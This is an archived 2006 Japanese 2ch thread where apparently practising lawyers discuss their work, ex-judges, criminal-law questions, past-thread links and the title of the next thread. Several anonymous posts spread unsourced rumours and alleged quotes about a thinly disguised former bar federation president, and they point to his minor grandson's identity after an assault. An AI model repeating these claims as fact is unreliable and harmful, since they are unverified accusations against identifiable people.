http://vladimir.mine.nu/germany_east2.mp3
http://vladimir.mine.nu/germany_east_vocal.mp3


912 :無責任な名無しさん:2006/07/24(月) 19:53:35 ID:T3YtcZBg
弁護士の仕事って激ブラックだよなぁ。
就職板のブラック企業ランキングが霞んで見える。

913 :無責任な名無しさん:2006/07/24(月) 20:11:10 ID:GlwPRv3Q
N坊の孫が事件起こしたらしいな。

914 :無責任な名無しさん:2006/07/24(月) 20:49:06 ID:pGH5WkEF
>>913
ソースを

915 :無責任な名無しさん:2006/07/24(月) 21:12:20 ID:+9pw3LPS
>>912
別にブラックじゃないぞ

916 :無責任な名無しさん:2006/07/24(月) 21:36:10 ID:0CTDYltu
 崩テラスにイタズラ電話した弁護士もいるらしい。世も末じゃ。

917 :無責任な名無しさん:2006/07/24(月) 21:38:30 ID:0CTDYltu
 じゃ,そろそろ新スレの名称を募集しましょう。

【お盆中も】弁護士本音talkスレPartXX【まだ居留守】


918 :無責任な名無しさん:2006/07/24(月) 21:43:39 ID:nwmOZrk8

【お盆中も】   【下請仕事】

919 :無責任な名無しさん:2006/07/24(月) 21:46:31 ID:MgXmfIaL
中1男子、母親切りつける…関西元大物弁護士の孫 (夕刊フジ)

24日午前7時40分ごろ、京都市東山区の民家で、中学1年の男子生徒(1
2)が母親(46)に包丁で切り付けた。母親は病院に運ばれたが、後頭部に
軽傷。京都府警東山署は、生徒を傷害の非行事実で補導し、動機を調べている
。生徒の祖父は、日本弁護士連合会(日弁連)会長などを歴任し、著書も多数
ある「元大物弁護士」として知られていた。

http://news.www.infoseek.co.jp/topics/society/injury/story/24fuji320060724021/





920 :無責任な名無しさん:2006/07/24(月) 21:49:00 ID:rWAd9o6K
ブラックかブラックでないかは,弁護士による。
厳密には客層・相手層による。

クレサラ弁護士は今やブラックでなくなった。
闇金全盛期はブラックな仕事だった。

損保の顧問は今も昔もブラックだ。
かたわになった被害者や当たり屋の半ヤクザを,脅し半分なだめ半分で諦めさせる。

マル暴の弁護専門でやっていても意外とクリーンな人もいる。
反対に,マル暴の手先(伝書鳩)でしかなくなっている弁護士もいる。

企業法務だからといってキレイとは限らない。
お家騒動の仲裁(双方代理ギリギリ)をやったり,敵対役員を排除するために会社法をこねくり回して解任したりするのも企業法務の一部である。



921 :無責任な名無しさん:2006/07/24(月) 21:50:47 ID:rWAd9o6K
>>919

元日弁連会長
元弁護士
著書多数
京都

○○死すとも司法改革は死せず。

922 :無責任な名無しさん:2006/07/24(月) 21:52:17 ID:rWAd9o6K
今日の日経に祖父への悪口が書いてあったよ。

>>917
【夏期休廷】  【どこの話?】


923 :無責任な名無しさん:2006/07/24(月) 21:54:22 ID:0CTDYltu
【依頼者さんと】   【腹上死】
【修習生が】     【押し寄せる】

924 :無責任な名無しさん:2006/07/24(月) 21:57:57 ID:0CTDYltu
【依頼者手みやげ】     【やっぱりワイン】

925 :MS754 ◆yGUnQdhyV2 :2006/07/24(月) 22:09:49 ID:ZQiWZad2
それでは、テンプレでも

○こちらは弁護士の方や関係者などの雑談スレになります。
○特定の個人名、事務所名、電話番号、住所などは絶対に書き込まないでください。
○司法試験関係は 「司法試験板」 http://school5.2ch.net/shihou/ がございます。
○法律相談は、最寄りの法律相談センターや弁護士会、各種相談スレまたは下記スレへ。
   やさしい法律相談 Part183
http://school5.2ch.net/test/read.cgi/shikaku/1153354023/
------------------------------------------------------------
○弁護士の本音トークスレです。
 したがって,それ以外の話題,たとえば
 ×弁護士に対する相談
 ×弁護士以外の人の過度のスレ参加
 はなるべくご遠慮ください。
○荒らしは無視の方向でしかるべく。
○なるべくsage進行で。


926 :MS754 ◆yGUnQdhyV2 :2006/07/24(月) 22:13:16 ID:ZQiWZad2
過去スレその1はそのままで

過去スレその2
12:【相談は】弁護士本音talkスレpart13【他のスレで】
http://school4.2ch.net/test/read.cgi/shikaku/1115537611/
13:【クールビズ】弁護士本音talkスレpart14【してる?】
http://school5.2ch.net/test/read.cgi/shikaku/1118220156/
14:【国選増額】弁護士本音talkスレ15【熱烈希望】
http://school5.2ch.net/test/read.cgi/shikaku/1122387067/
15:【風立ちぬ】弁護士本音talkスレ16【爽やかに】
http://school5.2ch.net/test/read.cgi/shikaku/1125622482/
16:【WELCOME】弁護士本音talkスレPart17【58期】
http://school5.2ch.net/test/read.cgi/shikaku/1128939534/
17:【食欲の秋】弁護士本音talkスレPart18【ダイエット】
http://school5.2ch.net/test/read.cgi/shikaku/1130480126/
18:【メリー】弁護士本音talkスレPart19【クリスマス】
http://school5.2ch.net/test/read.cgi/shikaku/1133217229/
19:【サヨナラ】弁護士本音talkスレPart20【みなし弁済】
http://school5.2ch.net/test/read.cgi/shikaku/1137164618/
20:【花見は】弁護士本音talkスレPart21【まだか?】
http://school5.2ch.net/test/read.cgi/shikaku/1141830790/
21:【連休中は】弁護士本音talkスレPart22【居留守】
http://school5.2ch.net/test/read.cgi/shikaku/1146261889/
22:【新法続々】弁護士本音talkスレPart23【日々勉強】
http://school5.2ch.net/test/read.cgi/shikaku/1149832472/








927 :無責任な名無しさん:2006/07/24(月) 22:16:40 ID:MgXmfIaL
当方,駆け出し弁護士ですが,上の弁護士に中坊の話を聞くと
あまり良い噂を聞きません。なんでですかね?

928 :MS754 ◆yGUnQdhyV2 :2006/07/24(月) 22:17:07 ID:ZQiWZad2
関連スレ
【ドラマと】事務員本音talkスレ5頁目【大違い】
http://school5.2ch.net/test/read.cgi/shikaku/1145260846/
■裁判官の部屋 その3■
http://school5.2ch.net/test/read.cgi/shikaku/1137575282/
【秋霜】検事になりたいんですがその13【烈日】
http://school5.2ch.net/test/read.cgi/shihou/1152247323/l50
■若手法曹スレッドpart1■
http://school5.2ch.net/test/read.cgi/shikaku/1112780497/
裁判所書記官だけでマターリしようよ
http://society3.2ch.net/test/read.cgi/koumu/1141056988/


929 :MS754 ◆yGUnQdhyV2 :2006/07/24(月) 22:18:47 ID:ZQiWZad2
サイト集は同じで。↑は検事スレのみ進んでいます。

930 :無責任な名無しさん:2006/07/24(月) 22:25:23 ID:DFv5cMbp
実際悪いことを結構やってるからだよ。
正義の味方は仮面に過ぎない。

931 :無責任な名無しさん:2006/07/24(月) 22:28:53 ID:TMmKy1AA
>>916
http://d.hatena.ne.jp/Barl-Karth/20060724


932 :無責任な名無しさん:2006/07/24(月) 22:30:15 ID:IlRa+/pA
【今年は】【メロンがない】

933 :無責任な名無しさん:2006/07/24(月) 22:44:28 ID:MgXmfIaL
>>930
うえの弁護士からは、
そういわれるものの具体的な話は教えてくれません。
かといって,みんながみんなそういうので本当だと思うけど。
具体例教えてくり

934 :無責任な名無しさん:2006/07/25(火) 03:57:27 ID:qkHCvw6l
>922に一票

しかしすぐ季節がずれてしまうか?

935 :無責任な名無しさん:2006/07/25(火) 07:47:11 ID:6STMxfuQ
【日本の夏】      【弁護士の夏】

936 :無責任な名無しさん:2006/07/25(火) 11:49:58 ID:mFm2NoRZ
>933

一将功なって万骨枯る

「金持ち以外弁護士になってはいけない」

「弁護士の報酬はお布施」



937 :無責任な名無しさん:2006/07/25(火) 11:52:27 ID:O6AHBEqn
【ゲート】      【キーパー】

938 :無責任な名無しさん:2006/07/25(火) 12:14:48 ID:C5AOpx+l
米国のボルトン国連大使がKBRにしか見えないのは俺だけか?

939 :無責任な名無しさん:2006/07/25(火) 16:10:21 ID:vjP+FlMB
国選の否認事件。
被告人の弁解の内容を事務員に話したら、
「先生、その内容を真面目な顔して法廷で言うんですか?」と言われた。

荒唐無稽な弁解でも、被告人が言ってる以上は、弁護士は言わなくちゃいけないんだよ。
……笑いをこらえる書記官と裁判官の顔が目に浮かぶわい……


940 :無責任な名無しさん:2006/07/25(火) 16:47:30 ID:f9ft4as3
同じ部屋のやつが俺のジュースに…
ってやつ?

941 :無責任な名無しさん:2006/07/25(火) 18:46:26 ID:LLmh+PYW
任意整理で、分割でありながら元本一部免除って皆さん結構できてます?

942 :無責任な名無しさん:2006/07/25(火) 19:08:15 ID:8x+xdVks
>>941
 ない。最終回で,1円残らず調整して支払う。2分割(2ヶ月)ぐらいなら,元本割れはあるか
も知れないが,やったことないから分からないね。
 て言うか,最近,頼みもしないのに,取引履歴を出してきて,「過払い金破産財団構成事案」が出そうだと,
事務員さんがこぼしていた。まぁ,実質,依頼者の懐は痛まないから良いけど・・・・。

943 :無責任な名無しさん:2006/07/25(火) 19:12:22 ID:UtruE9RB
教徒で母親を斬りつけた中学生
中坊の孫らしいぞ。

中坊の孫が厨房(プッ)って
少年の名前は報道しなくても
思いっきり個人特定されるがな。

944 :無責任な名無しさん:2006/07/25(火) 19:58:38 ID:6STMxfuQ
だから中房の名前は報道されてないんだよ

945 :無責任な名無しさん:2006/07/25(火) 20:41:13 ID:UtruE9RB
普通に報道されとりますがな。
俺は日刊ゲンダイ買っただけですけど

2chではもうニュース系板でバリバリですぜ。

946 :無責任な名無しさん:2006/07/25(火) 22:07:40 ID:YYTpC8jD
裁判官上がりの弁護士は、普通の弁護士よりも、訴訟戦術がたけているのですか。
というのが、訴状を相手方が答弁書出す前に、マスコミに配布する元某地裁の判事をしていた人なのです。
普通は、自分の書いた訴状をマスコミに手渡す事自体、勝つ自信があると思うのですが。

947 :無責任な名無しさん:2006/07/25(火) 22:30:11 ID:15UE6uUj
自己顕示欲

948 :無責任な名無しさん:2006/07/25(火) 23:20:45 ID:CCcG/9Kq
【契約拒否?】   【法テラス】

949 :無責任な名無しさん:2006/07/25(火) 23:30:24 ID:4fnFljDC
>>948
そんなスレタイだと、
http://school5.2ch.net/test/read.cgi/shikaku/1146661132/
こういうスレにいる人達を呼び込むことになる。
どのスレタイの時か忘れたけど、相談者が結構来るようになったスレもあったし。
笑える様なスレタイの方がよろしいかと。

950 :無責任な名無しさん:2006/07/25(火) 23:48:37 ID:2LH63TxQ
鬱には有酸素運動が効く。

水泳がいいらしい。
平泳ぎやバタフライは腰を痛めるから駄目。
ひたすらクロールと背泳ぎをすると肩こりもせず、鬱も治るらしい。

もっとも、円谷のように自殺したマラソン選手もいたから有酸素運動が絶対的な者だとはおもわんがね。

951 :無責任な名無しさん:2006/07/26(水) 00:02:26 ID:YA8158ec
【契約拒否?】  【7/31まで】

東京だけかもしれないけど・・・

952 :無責任な名無しさん:2006/07/26(水) 00:09:34 ID:zZhNHxfu
>>946
裁判官の経験が長いほど、ダメな弁護士という推定が・・・
例外もあるだろうけど

953 :無責任な名無しさん:2006/07/26(水) 00:16:43 ID:FVpAEOSY
 メディアに訴状をファックスしたり,記者会見したりすると町会される場合もあるから,気をつけた方が良い。(答弁書受領後でも危ない)。

954 :無責任な名無しさん:2006/07/26(水) 03:15:42 ID:FVpAEOSY
>>949
 敢えて・・・・
【国選辞めますか】  【契約しますか】


955 :無責任な名無しさん:2006/07/26(水) 03:56:43 ID:1BkSIKuq
>>751

答弁なんですが、7月31日まで、拒否しないと、その後は拒否できないの?

956 :無責任な名無しさん:2006/07/26(水) 08:10:47 ID:O3aXLvOW
【みんなで入ろう】       【法テラス】

957 :無責任な名無しさん:2006/07/26(水) 08:30:20 ID:LbNj289w
>>952
先生ご自身が経験された具体的な例を、いくつかご教示下さい。
向後の反省の材料にいたしたく。 当方退官予定者

958 :無責任な名無しさん:2006/07/26(水) 09:01:59 ID:ikYSE4sc
刑事で量刑が見えてしまうが為に
情状立証を怠ったり。


959 :無責任な名無しさん:2006/07/26(水) 10:59:22 ID:KsQ40YSh
>>946
むしろヘタです

960 :無責任な名無しさん:2006/07/26(水) 11:12:39 ID:KsQ40YSh
>>957
無駄に堅い立証をしようとして訳が分からなくなる。事件のスジが見えなくなる。
世間を知らず,また事件がないのにプライドは一人前だから,愚かしくスジ悪事件を平気でつかむ。案の定訳分からなくなる。
で,自分で勝手に結論を出しちゃって,主張すべきことを主張しない。
あと,旧報酬基準通りの金を平気で取る。高い。
法廷には出ない細々としたことをやらない。
文句言った方が良いときでも警察や検察官の言いなりになる。検察・警察を無駄に信用している。

ま,どこかでイソ弁的に誰かにくっついてしばらく勉強してからの方が良いと思うよ。
弁護士活動3,4か月しか知らないんだから。


961 :無責任な名無しさん:2006/07/26(水) 11:19:29 ID:PfVZIxSz
>>957
・準備書面で相手方代理人を侮辱する
・双方代理に近いことをやる
・刑事民事を問わず証拠に基づかない弁論をする
・証拠の副本が原本と違う
・過大報酬の請求
・相談者の言うことを鵜呑みにして勝訴を保証
・事件放置
・期日ダブルブッキング
・事務員に示談交渉をさせる
・刑事事件被害者を事務所に呼びつけて示談交渉


962 :無責任な名無しさん:2006/07/26(水) 11:24:38 ID:PfVZIxSz
基本的に,裁判官は,弁護士を
・金が儲かる
・当事者に任せる
・汚いことをする
・白を黒に,黒を白にする
もんだと誤解している。

便所掃除みたいな肉体労働だということを理解していない。

>>961
・依頼者や相手方を電話で罵倒する
を追加。

963 :無責任な名無しさん:2006/07/26(水) 11:32:41 ID:KsQ40YSh
ま,ヤメ判はこんなものだということでしょう。

964 :無責任な名無しさん:2006/07/26(水) 12:59:21 ID:etJVW+PD
田舎弁なんだけど、意思疎通困難な高齢者の相談対応に難儀している。
弁護士による何らかの援助が望ましいケースもあるのだが、状況を
把握することが困難だったり、こちらの説明や法律的な話を理解して
もらうことが難しかったり、あるいは弁護士にお願いすればとにかく
何とかなるものと考えていたりで、受任するのに二の足を踏んでしまう
ことも多々ある。
で、たまに受任すると、打ち合わせごとに言うことが違ったり、
全く予想外の事実が出てきたりで、いろいろ困ったり。
これからは呆テラスを紹介すればいいのかな。


965 :無責任な名無しさん:2006/07/26(水) 13:11:10 ID:VwPCVe8R
俺に回ってくるからやめてくれ。
スタッフではないよ。

966 :無責任な名無しさん:2006/07/26(水) 13:13:35 ID:Kt7zJznm
>>863

ネットで炎上を繰り返す同業弁護士にも似たところがあるから。
漏れたちも他山の石として襟をただしておかないと。
罵倒や侮辱や嫌味皮肉当て擦りは結局しない方がいいよ。
たとえ依頼者向けのポーズだったとしても。

967 :966:2006/07/26(水) 13:14:27 ID:Kt7zJznm
アンカーミス スマソ
>>963様宛です

968 :無責任な名無しさん:2006/07/26(水) 13:32:42 ID:Qt1D1i4z
 ヤメ判弁護士というだけで一律化はできないと思います。
 そもそも法曹としての資質が不足していて、裁判官を辞めて弁護士になった人が目立っているだけのように思います。
 もっとも、訴訟では、当事者として経験をつんできた否かの影響は出やすいようにも思いますが、優秀な方なら程なく切り替えられると思います。

969 :無責任な名無しさん:2006/07/26(水) 14:09:45 ID:szWnhsfd
>>933
○弁護士は任官の命令がきたら「赤紙」がきたと思って任官せよ
(有能な弁護士に任官を義務づけるという持論を主張する中で―某地元テレビ局での発言)

○弁護士報酬はお布施なので依頼人が感謝した分だけもらえればいい。
(審議会や著書などあちこちで発言)

○事務員は残業させたら残業代を払わなきゃあかんが、イソ弁には残業代を払わなくて
もいいのでどんどん働いてもらえばいい。
(弁護士会の会合などあちこちで発言ーちなみに大阪にはイソ弁をこき使うことで有名な
「蛸部屋」事務所がいくつかあり彼の事務所はその一つとして地元では有名であった)



970 :無責任な名無しさん:2006/07/26(水) 14:12:55 ID:vc6KhOmc
3タコ
中○,中○,宮○

971 :無責任な名無しさん:2006/07/26(水) 14:14:41 ID:nzlefoU1
やめ判でも優秀な弁護士はたくさんいるよ。
裁判官を定年まで勤め上げてから弁護士登録した人に、比較的問題が多い気がする。

ただ、若くても定年後でも、双方代理・利益相反に鈍めな傾向はある感じ。

972 :無責任な名無しさん:2006/07/26(水) 14:34:33 ID:szWnhsfd
>>933
こういうのもあったな

○女の弁護士は採用しない。女は家事や育児で長時間勤務させられないので
弁護士としてのキャリアが積めないから。
(正確には記憶してないが大弁会長か日弁連会長時代の発言だったかな。
もちろん女性弁護士の大顰蹙をかったのはいうまでもない。彼の事務所は女性
採用しないことで有名であった)



973 :無責任な名無しさん:2006/07/26(水) 14:35:56 ID:X66VePNV
>>971
当事者の代わりに主張するっていうより、
自分が間に入って解決してやるって意識かな。

974 :無責任な名無しさん:2006/07/26(水) 14:40:19 ID:Kt7zJznm
>>973
長年の勤務で染み付いた裁判官気質が抜けないだと思うよ
ヤメ判にADRを丸投げしたらうまくいくかも知れないですね

975 :無責任な名無しさん:2006/07/26(水) 14:42:04 ID:X66VePNV
名誉毀損になるおそれがあるのであれだが、
どこぞの大物弁護士は、公害事件かなんかで
医者側にわざと論文をかかせて、原因物質の
発見時期を遅らせることに成功したそうだ。

そんなたぐいの話なら、後輩の弁護士にも
言いにくかろう。

976 :無責任な名無しさん:2006/07/26(水) 14:47:39 ID:Kt7zJznm
例の四大公害裁判のうちのひとつですね
それは結構水面下で有名な話として流布してます
だってご本人が酔うと自慢して聴きもしないのに自ら(ry

977 :無責任な名無しさん:2006/07/26(水) 14:49:27 ID:VwPCVe8R
君、Sだろ?

978 :無責任な名無しさん:2006/07/26(水) 15:51:46 ID:aqZS0bFW
ちょっと自信がなくなったんで確認したいんだが。
A事件を起こし、起訴されて執行猶予付き判決を受け、確定した。
ところが、この被告人はA事件の前にB事件も起こしていて、A事件の裁判が確定した後に、B事件が発覚し、起訴された。
この場合、B事件の弁論のときに執行猶予を求める場合は、刑法25条2項の「再度の執行猶予」ではなくて、
刑法25条1項1号の執行猶予を求めることになるんだよな?
だから、弁論でも「再度の執行猶予を求める」ではなく「執行猶予を求める」でいいんだよな?

979 :無責任な名無しさん:2006/07/26(水) 16:37:04 ID:mjSFvIxi
>>978
そう。最高裁判決があったはず。

980 :無責任な名無しさん:2006/07/26(水) 17:00:02 ID:KsQ40YSh
最高裁判所刑事判例集11巻2号503頁
最高裁判所裁判集刑事117号717頁
裁判所時報226号34頁
判例時報108号18頁

こんな感じですかね
25条1-1ですね


981 :無責任な名無しさん:2006/07/26(水) 17:28:35 ID:etJVW+PD
むしろ模範六法を見れば早いと思われ。

ところで、便乗して質問だけど、
A事件で有罪判決を受け、その後で、その後に犯したB事件で
有罪判決を受け、その後で、A事件の前に犯したC事件で有罪判決を
受けた人(A〜C事件はいずれも窃盗、AとCが併合罪)が、
今回また窃盗をやって、AないしC事件からの期間が10年以内という場合、
今回は常習累犯窃盗になるんでしょうか?


982 :無責任な名無しさん:2006/07/26(水) 18:39:59 ID:KsQ40YSh
模範六法

983 :無責任な名無しさん:2006/07/26(水) 19:46:08 ID:PfVZIxSz
起訴されれば起訴状が教えてくれる

984 :MS754 ◆yGUnQdhyV2 :2006/07/26(水) 20:24:48 ID:BRx2NeEN
そろそろ次スレを立てたいのですが。
スレタイは、個人的には↓でどうかと思いますが。
  【お盆中も】弁護士本音talkスレPart24【居留守】



985 :無責任な名無しさん:2006/07/26(水) 20:25:03 ID:BEuUJekM
仲棒の悪質な子分どももまとめて地獄に落ちろ

986 :無責任な名無しさん:2006/07/26(水) 21:00:33 ID:VwPCVe8R
はいはい。

987 :無責任な名無しさん:2006/07/26(水) 21:26:21 ID:3eDzcvI4
>>984
無難でいいですね。
スレの雰囲気が悪くなりそうな書き込みを避ける,という点からは>>984に一票。

988 :MS754 ◆yGUnQdhyV2 :2006/07/26(水) 21:43:36 ID:BRx2NeEN
ホスト規制で立てられません。どなたかよろしくお願いいたします。
スレタイと最初のテンプレです↓

【お盆中も】弁護士本音talkスレPart24【居留守】

前スレ↓
【新法続々】弁護士本音talkスレPart23【日々勉強】
http://school5.2ch.net/test/read.cgi/shikaku/1149832472/
注意書き,リンク集などは>>2-10あたりに・・・

989 :無責任な名無しさん:2006/07/26(水) 22:07:48 ID:FsIZfEdr
>>988
【お盆中も】弁護士本音talkスレPart24【居留守】
http://school5.2ch.net/test/read.cgi/shikaku/1153918884/

たてますた。

990 :無責任な名無しさん:2006/07/26(水) 22:17:43 ID:FsIZfEdr
1:【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/

より、まえのスレをみつけてしました。

弁護士本音talkスレッド
http://school.2ch.net/test/read.cgi/shikaku/998739465/

どうすれば、いいのでしょうか?

991 :MS754 ◆yGUnQdhyV2 :2006/07/26(水) 22:23:55 ID:BRx2NeEN
>>989
お疲れ様でした。ところで、ご指摘の

弁護士本音talkスレッド
http://school.2ch.net/test/read.cgi/shikaku/998739465/

「datが存在しません。」となるのですか。




992 :無責任な名無しさん:2006/07/26(水) 22:31:53 ID:FsIZfEdr
自分のStyleは過去ログやdat落ちログが取り出すように
改良してあるので

【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/

を過去ログを取り出して、中身をみたら

弁護士本音talkスレッド
http://school.2ch.net/test/read.cgi/shikaku/998739465/

を発見して、また、内容を確認したところ
これがオリジナルであることがわかりました。

IEで、見る場合は

弁護士本音talkスレッド
http://yasai.2ch.net/shikaku/kako/998/998739465.html

を使ってください。

993 :無責任な名無しさん:2006/07/26(水) 22:39:47 ID:FsIZfEdr
>>992
ちなみなんでそんなことをしたのかというと

1:【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/

なんで、1:なのに、その2なんだろうな〜?
と不思議に思ったからです。

ただ、この作業をしたのは、
スレたてが終わってから、
気がついたのと、過去ログのテンプレを
勝手に替えるわけにいかないので
お伺いをたてました。

今日のトリヴィアは、
弁護士バッチの裏にはバッチをなくした
回数が書かれているでした。



994 :MS754 ◆yGUnQdhyV2 :2006/07/26(水) 23:16:29 ID:BRx2NeEN
>>993
実は、ずっと以前に、みんなで過去ログを整理していた時に、なぜか、「その1」が
見つからなかったために、「その2」が「1:」になっていたのです。

「その1」が発見されたということですので、次々スレでは、過去スレのトップに
もって行きたいと思いますが、皆さん、よろしいでしょうか?

995 :無責任な名無しさん:2006/07/26(水) 23:30:35 ID:FsIZfEdr
過去スレその1
弁護士本音talkスレッド
http://school.2ch.net/test/read.cgi/shikaku/998739465/
【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/
【雑談】弁護士本音talkスレ その3【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1065526506/
【希望】弁護士本音talkスレ その4【失望】
http://school2.2ch.net/test/read.cgi/shikaku/1074280112/
【希望】弁護士本音talkスレ その5【失望】
http://school4.2ch.net/test/read.cgi/shikaku/1080568884/
【夏期】弁護士本音talkスレ その6【休廷】
http://school4.2ch.net/test/read.cgi/shikaku/1087307654/
【夏バテ】弁護士本音talkスレpart7【ビール腹】
http://school4.2ch.net/test/read.cgi/shikaku/1091890714/
【ようこそ】弁護士本音talkスレPart8【第58期よ】
http://school4.2ch.net/test/read.cgi/shikaku/1096634157/
【諸行】弁護士本音talkスレPart9【無常】
http://school4.2ch.net/test/read.cgi/shikaku/1099052870/
【忘年会】弁護士本音talkスレpart10【新年会】
http://school4.2ch.net/test/read.cgi/shikaku/1102088211/
【確定】弁護士本音talkスレpart11【申告】
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/
【黄金】弁護士本音talkスレpart12【週間】
http://school4.2ch.net/test/read.cgi/shikaku/1113138219/

996 :無責任な名無しさん:2006/07/26(水) 23:32:13 ID:FsIZfEdr
過去スレその2
【相談は】弁護士本音talkスレpart13【他のスレで】
http://school4.2ch.net/test/read.cgi/shikaku/1115537611/
【クールビズ】弁護士本音talkスレpart14【してる?】
http://school5.2ch.net/test/read.cgi/shikaku/1118220156/
【国選増額】弁護士本音talkスレ15【熱烈希望】
http://school5.2ch.net/test/read.cgi/shikaku/1122387067/
【風立ちぬ】弁護士本音talkスレ16【爽やかに】
http://school5.2ch.net/test/read.cgi/shikaku/1125622482/
【WELCOME】弁護士本音talkスレPart17【58期】
http://school5.2ch.net/test/read.cgi/shikaku/1128939534/
【食欲の秋】弁護士本音talkスレPart18【ダイエット】
http://school5.2ch.net/test/read.cgi/shikaku/1130480126/
【メリー】弁護士本音talkスレPart19【クリスマス】
http://school5.2ch.net/test/read.cgi/shikaku/1133217229/
【サヨナラ】弁護士本音talkスレPart20【みなし弁済】
http://school5.2ch.net/test/read.cgi/shikaku/1137164618/
【花見は】弁護士本音talkスレPart21【まだか?】
http://school5.2ch.net/test/read.cgi/shikaku/1141830790/
【連休中は】弁護士本音talkスレPart22【居留守】
http://school5.2ch.net/test/read.cgi/shikaku/1146261889/
【新法続々】弁護士本音talkスレPart23【日々勉強】
http://school5.2ch.net/test/read.cgi/shikaku/1149832472/

997 :無責任な名無しさん:2006/07/26(水) 23:36:35 ID:FsIZfEdr
>>995-996
は、ためしに修正した過去ログのテンプレです。
その1が出てきたので、番号は削除してみました。

その25でそのまま使えるようにしてあります。

998 :MS754 ◆yGUnQdhyV2 :2006/07/27(木) 00:05:49 ID:/D1qAofh
>>997
最初のに「http://yasai.2ch.net/shikaku/kako/998/998739465.html 」も
つけておきませんか?


999 :MS754 ◆yGUnQdhyV2 :2006/07/27(木) 00:10:51 ID:/D1qAofh
弁護士本音talkスレッド
http://school.2ch.net/test/read.cgi/shikaku/998739465/
http://yasai.2ch.net/shikaku/kako/998/998739465.html
【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/
【雑談】弁護士本音talkスレ その3【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1065526506/
【希望】弁護士本音talkスレ その4【失望】
http://school2.2ch.net/test/read.cgi/shikaku/1074280112/
【希望】弁護士本音talkスレ その5【失望】
http://school4.2ch.net/test/read.cgi/shikaku/1080568884/
【夏期】弁護士本音talkスレ その6【休廷】
http://school4.2ch.net/test/read.cgi/shikaku/1087307654/
【夏バテ】弁護士本音talkスレpart7【ビール腹】
http://school4.2ch.net/test/read.cgi/shikaku/1091890714/
【ようこそ】弁護士本音talkスレPart8【第58期よ】
http://school4.2ch.net/test/read.cgi/shikaku/1096634157/
【諸行】弁護士本音talkスレPart9【無常】
http://school4.2ch.net/test/read.cgi/shikaku/1099052870/
【忘年会】弁護士本音talkスレpart10【新年会】
http://school4.2ch.net/test/read.cgi/shikaku/1102088211/
【確定】弁護士本音talkスレpart11【申告】
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/
【黄金】弁護士本音talkスレpart12【週間】
http://school4.2ch.net/test/read.cgi/shikaku/1113138219/

1000 :MS754 ◆yGUnQdhyV2 :2006/07/27(木) 00:17:39 ID:/D1qAofh
次スレです。
http://school5.2ch.net/test/read.cgi/shikaku/1153918884/

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

286 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)